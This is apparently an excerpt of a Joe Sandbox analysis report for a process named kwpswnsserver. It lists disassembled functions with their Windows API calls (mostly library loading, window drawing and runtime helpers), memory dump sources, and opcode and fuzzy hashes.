                                                                  • Instruction ID: 4584df9d4f4ee840b016aac63431ab9eea507ac1dd2df16b60c9a87a3fe93bef
                                                                  • Opcode Fuzzy Hash: 69a32966f5368f0aea2cda25c87aea173b131ffa60d08f49c25b303a99b088ea
                                                                  • Instruction Fuzzy Hash: B6F0823164533BAB8F252BA88D1C98A3BB8FB067493408525FD0DE3604DB30D8038BA4
                                                                  Function 6C8A634E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C8A6360
                                                                  • GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 6C8A6370
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A6379
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A6387
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: ChangeWindowMessageFilter$user32.dll
                                                                  • API String ID: 2061474489-2498399450
                                                                  • Opcode ID: dfcd67e5186781774cd74ea6e319182080d5c64e08e58c7be19df30a87881bd4
                                                                  • Instruction ID: c298575d33e419a7613f1f7ae628e6d2e03605fe878a9adc16ec15ac98d66211
                                                                  • Opcode Fuzzy Hash: dfcd67e5186781774cd74ea6e319182080d5c64e08e58c7be19df30a87881bd4
                                                                  • Instruction Fuzzy Hash: B7F089357423369F9F252BB9CD1C95A3BB8FB066953408911FC09D3604E731C40396A0
                                                                  Function 6C8A629D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C8899DE,00000000), ref: 6C8A62AF
                                                                  • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 6C8A62BF
                                                                  • EncodePointer.KERNEL32(00000000,?,?,6C8899DE,00000000), ref: 6C8A62C8
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C8899DE,00000000), ref: 6C8A62D6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: ApplicationRecoveryInProgress$kernel32.dll
                                                                  • API String ID: 2061474489-2899047487
                                                                  • Opcode ID: 6d921090adf9437cae0bb420df7a02d9d1a1526ff5de26662e94f14eb8c3b185
                                                                  • Instruction ID: 1b1ddbd14d034d02c4b1b53dc5bb42af1355737bd2224b1e0b7df84c9a5d4b39
                                                                  • Opcode Fuzzy Hash: 6d921090adf9437cae0bb420df7a02d9d1a1526ff5de26662e94f14eb8c3b185
                                                                  • Instruction Fuzzy Hash: F0F03E35741337AB9F2527BC8D1C55A37B8BB057597808529FC05E3E08DB74C5134790
                                                                  Function 6C8A62F9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C889A21,00000001), ref: 6C8A630B
                                                                  • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 6C8A631B
                                                                  • EncodePointer.KERNEL32(00000000,?,6C889A21,00000001), ref: 6C8A6324
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C889A21,00000001), ref: 6C8A6332
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: ApplicationRecoveryFinished$kernel32.dll
                                                                  • API String ID: 2061474489-1962646049
                                                                  • Opcode ID: 2fb56e9e8f3c88b546aa4a021691dd3a76ae796e6fb5ac45e281720535a2964d
                                                                  • Instruction ID: a3017ec0c184710ade7f14462f1dad760aa054dc038437be1126c7269ab29d9a
                                                                  • Opcode Fuzzy Hash: 2fb56e9e8f3c88b546aa4a021691dd3a76ae796e6fb5ac45e281720535a2964d
                                                                  • Instruction Fuzzy Hash: 2EF06C7170633B6B8F252BB98D1C95A7BBCFE0564A340C911FC0AD3604DB30C50347A0
                                                                  Function 6C8A6474 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(shell32.dll,?,6C88FE8C,?,?,6C891542,000FC000,00000010,00000048,6C891721,?,?,?,?,00000000), ref: 6C8A6483
                                                                  • GetProcAddress.KERNEL32(00000000,InitNetworkAddressControl), ref: 6C8A6493
                                                                  • EncodePointer.KERNEL32(00000000,?,?,6C891542,000FC000,00000010,00000048,6C891721,?,?,?,?,00000000,?,6C8919D1,?), ref: 6C8A649C
                                                                  • DecodePointer.KERNEL32(00000000,?,6C88FE8C,?,?,6C891542,000FC000,00000010,00000048,6C891721,?,?,?,?,00000000), ref: 6C8A64AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: InitNetworkAddressControl$shell32.dll
                                                                  • API String ID: 2061474489-1950653938
                                                                  • Opcode ID: 7187456e946026d03d3d2c7b71957503825fb2d9a8eb5b1f8e9567fcfaeace19
                                                                  • Instruction ID: 32c1a36c1f6b8900a48c006763060368b8876d872b8ddd29155b5ecb48a5d629
                                                                  • Opcode Fuzzy Hash: 7187456e946026d03d3d2c7b71957503825fb2d9a8eb5b1f8e9567fcfaeace19
                                                                  • Instruction Fuzzy Hash: E3E03035707B375F9B386AB89D1C55B37B8AB06655340C951FC09D2604D724894386A4
                                                                  Function 6C8A65AA Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(uxtheme.dll,?,6C89EEEA,?,?,6C89E183,E343E0B4,?,?,?,Function_0019BE40,000000FF), ref: 6C8A65B9
                                                                  • GetProcAddress.KERNEL32(00000000,BufferedPaintUnInit), ref: 6C8A65C9
                                                                  • EncodePointer.KERNEL32(00000000,?,6C89EEEA,?,?,6C89E183,E343E0B4,?,?,?,Function_0019BE40,000000FF), ref: 6C8A65D2
                                                                  • DecodePointer.KERNEL32(00000000,?,6C89EEEA,?,?,6C89E183,E343E0B4,?,?,?,Function_0019BE40,000000FF), ref: 6C8A65E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: BufferedPaintUnInit$uxtheme.dll
                                                                  • API String ID: 2061474489-1501038116
                                                                  • Opcode ID: 758c5297f3ab81f8de95bb0d969f89d0143c6a532fa0617dd34c4024f29256c7
                                                                  • Instruction ID: f2f5eca77440fedaafc4da4d11a63bb4123dbb1978c6e690294eaa96f5027a89
                                                                  • Opcode Fuzzy Hash: 758c5297f3ab81f8de95bb0d969f89d0143c6a532fa0617dd34c4024f29256c7
                                                                  • Instruction Fuzzy Hash: 24E06531B413339F8F2977B8AD1C55A36B4BB466593458625FC15D3A0CDB24C9438BE4
                                                                  Function 6C8A6555 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(uxtheme.dll,?,6C89DD38,?,?,?,?,?,?,?,?,00000008), ref: 6C8A6564
                                                                  • GetProcAddress.KERNEL32(00000000,BufferedPaintInit), ref: 6C8A6574
                                                                  • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000008), ref: 6C8A657D
                                                                  • DecodePointer.KERNEL32(00000000,?,6C89DD38,?,?,?,?,?,?,?,?,00000008), ref: 6C8A658B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: BufferedPaintInit$uxtheme.dll
                                                                  • API String ID: 2061474489-1331937065
                                                                  • Opcode ID: 4856a03180ab0083464bcf0cf6b2e1408b21093600fd815add3b97372a76be0d
                                                                  • Instruction ID: f68b24122c4252f03eb30fda91c437a097abd7ac87e60d6aeb349e9c7395142e
                                                                  • Opcode Fuzzy Hash: 4856a03180ab0083464bcf0cf6b2e1408b21093600fd815add3b97372a76be0d
                                                                  • Instruction Fuzzy Hash: CBE065317567339F8F346779ED1C54A37B8BB06649341C611FC06D2A08D724CA438FA4
                                                                  Function 6C8A690F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(comctl32.dll), ref: 6C8A691E
                                                                  • GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 6C8A692E
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A6937
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A6949
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: TaskDialogIndirect$comctl32.dll
                                                                  • API String ID: 2061474489-2809879075
                                                                  • Opcode ID: 11369f0eacf3740d83669fefe282c0312c11dbcf9c8048fe1ffeb30393b5dd65
                                                                  • Instruction ID: e95608c8c5a9cc1384ccd2b673a8edb2f0a6343b3256b25e2842e947c8825392
                                                                  • Opcode Fuzzy Hash: 11369f0eacf3740d83669fefe282c0312c11dbcf9c8048fe1ffeb30393b5dd65
                                                                  • Instruction Fuzzy Hash: 30E012327553339F5B246AB85E1C98636B5AF06699305DD11EC06D2608D724D94346A1
                                                                  Function 6C9D215E Relevance: 9.3, APIs: 6, Instructions: 295COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __allrem.LIBCMT ref: 6C9D22F1
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D230D
                                                                  • __allrem.LIBCMT ref: 6C9D2324
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D2342
                                                                  • __allrem.LIBCMT ref: 6C9D2359
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D2377
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                  • String ID:
                                                                  • API String ID: 1992179935-0
                                                                  • Opcode ID: fa866c5c7d7155fef1103d916caff05d307b3502a189a0f6bb38c3903391fa4b
                                                                  • Instruction ID: dee48443db04a19e6dcb32bb7bdd7f44ef2787c76400c88844a18b9998c0da2c
                                                                  • Opcode Fuzzy Hash: fa866c5c7d7155fef1103d916caff05d307b3502a189a0f6bb38c3903391fa4b
                                                                  • Instruction Fuzzy Hash: 7791FB72A00F029BE7148E69CC44B9AB3B9AF65768F16C229E510F7F90E770FE448750
                                                                  Function 6C8C2240 Relevance: 9.3, APIs: 6, Instructions: 293windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 6C8C2370
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8C2384
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8C23AD
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C8C23C1
                                                                    • Part of subcall function 6C88AC28: GetParent.USER32(?), ref: 6C88AC32
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C8C2423
                                                                  • GetFocus.USER32 ref: 6C8C254A
                                                                    • Part of subcall function 6C8E7FAA: __EH_prolog3_GS.LIBCMT ref: 6C8E7FB4
                                                                    • Part of subcall function 6C8E7FAA: GetWindowRect.USER32(?,?), ref: 6C8E8048
                                                                    • Part of subcall function 6C8E7FAA: SetRect.USER32(?,00000000,00000000,?,?), ref: 6C8E8069
                                                                    • Part of subcall function 6C8E7FAA: CreateCompatibleDC.GDI32(?), ref: 6C8E8075
                                                                    • Part of subcall function 6C8E7FAA: CreateCompatibleBitmap.GDI32(?,?,00000128), ref: 6C8E809F
                                                                    • Part of subcall function 6C8E7FAA: GetWindowRect.USER32(?,?), ref: 6C8E80F4
                                                                    • Part of subcall function 6C8E7FAA: GetClientRect.USER32(?,?), ref: 6C8E8101
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$CompatibleCreateMessageSend$BitmapClientCursorFocusH_prolog3_Parent
                                                                  • String ID:
                                                                  • API String ID: 2914356772-0
                                                                  • Opcode ID: 5f54109335ce2fc8dd2b2155f26eaca5f14cbdcc0b9c103589ea670cbebba90b
                                                                  • Instruction ID: 6a0b75d6faec81f5f8e5e25f0938f1afdbde8150a37245188ee94745e0730241
                                                                  • Opcode Fuzzy Hash: 5f54109335ce2fc8dd2b2155f26eaca5f14cbdcc0b9c103589ea670cbebba90b
                                                                  • Instruction Fuzzy Hash: C4A1F475B0031ACFDB289F69C958AAE77B4BF45318B10497EE815A7B90DB38DC01CB91
                                                                  Function 6C8C08E4 Relevance: 9.2, APIs: 6, Instructions: 229windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 6C8C08F3
                                                                    • Part of subcall function 6C880847: __EH_prolog3.LIBCMT ref: 6C88084E
                                                                  • GetClientRect.USER32(?,?), ref: 6C8C0935
                                                                    • Part of subcall function 6C883F11: ClientToScreen.USER32(?,6C8BDD00), ref: 6C883F20
                                                                    • Part of subcall function 6C883F11: ClientToScreen.USER32(?,6C8BDD08), ref: 6C883F2D
                                                                  • IsWindowVisible.USER32(?), ref: 6C8C0B6E
                                                                  • SetTimer.USER32(00000000,0000EC15,00000000), ref: 6C8C0B91
                                                                  • InvalidateRect.USER32(?,00000000,00000001,6CA57AD8,00000000,00000000,00000000,00000000,00000053), ref: 6C8C0C00
                                                                  • UpdateWindow.USER32(?), ref: 6C8C0C09
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Client$RectScreenWindow$CursorH_prolog3InvalidateLoadTimerUpdateVisible
                                                                  • String ID:
                                                                  • API String ID: 3378768144-0
                                                                  • Opcode ID: 8dbafc1f110b1daf913162e5099eca250f06ae6590c0f6efa402a2c12fe80b38
                                                                  • Instruction ID: 3374b5e3ab17b789722da2531e06c322e0dcc392e6ffdc3197b64ae03678e829
                                                                  • Opcode Fuzzy Hash: 8dbafc1f110b1daf913162e5099eca250f06ae6590c0f6efa402a2c12fe80b38
                                                                  • Instruction Fuzzy Hash: E5A15970B012099FDF24CF28CA94BED77B1AF44348F14497AEC19ABB95DB30A945CB51
                                                                  Function 6C8D056B Relevance: 9.2, APIs: 6, Instructions: 214COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8D0572
                                                                  • InflateRect.USER32(?,000000FF,00000000), ref: 6C8D0592
                                                                  • InflateRect.USER32(?,000000FF,000000FE), ref: 6C8D05B7
                                                                  • FillRect.USER32(?,?,?), ref: 6C8D05D8
                                                                  • __EH_prolog3.LIBCMT ref: 6C8D0730
                                                                  • GetTextColor.GDI32(?), ref: 6C8D0741
                                                                    • Part of subcall function 6C89F0E3: __EH_prolog3.LIBCMT ref: 6C89F0EA
                                                                    • Part of subcall function 6C89F0E3: SysStringLen.OLEAUT32(?), ref: 6C89F129
                                                                    • Part of subcall function 6C89F0E3: SysStringLen.OLEAUT32(?), ref: 6C89F148
                                                                    • Part of subcall function 6C89F0E3: SysFreeString.OLEAUT32(?), ref: 6C89F1CF
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: RectString$H_prolog3Inflate$ColorFillFreeH_prolog3_Text
                                                                  • String ID:
                                                                  • API String ID: 1455384773-0
                                                                  • Opcode ID: 62e85c524be4eb08d5e4979c2c4499f216cde7423b32b83d34a228f36735ee2c
                                                                  • Instruction ID: 9c58122682d46cbf6ca77ae67462efafde329d008c72a167352c9b2c02940746
                                                                  • Opcode Fuzzy Hash: 62e85c524be4eb08d5e4979c2c4499f216cde7423b32b83d34a228f36735ee2c
                                                                  • Instruction Fuzzy Hash: D1715D71A0120DAFCF15DF68C940AEE7BB6AF48318F114525F811A7B90DB35ED59CBA0
                                                                  Function 6C8B4096 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 6C8B4239
                                                                  • GetParent.USER32(?), ref: 6C8B4258
                                                                  • GetParent.USER32(?), ref: 6C8B4267
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000505,6CA0A554,00000000), ref: 6C8B42CD
                                                                  • GetParent.USER32(?), ref: 6C8B42D6
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000505,00000000), ref: 6C8B42FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Parent$RedrawWindow
                                                                  • String ID:
                                                                  • API String ID: 2946272266-0
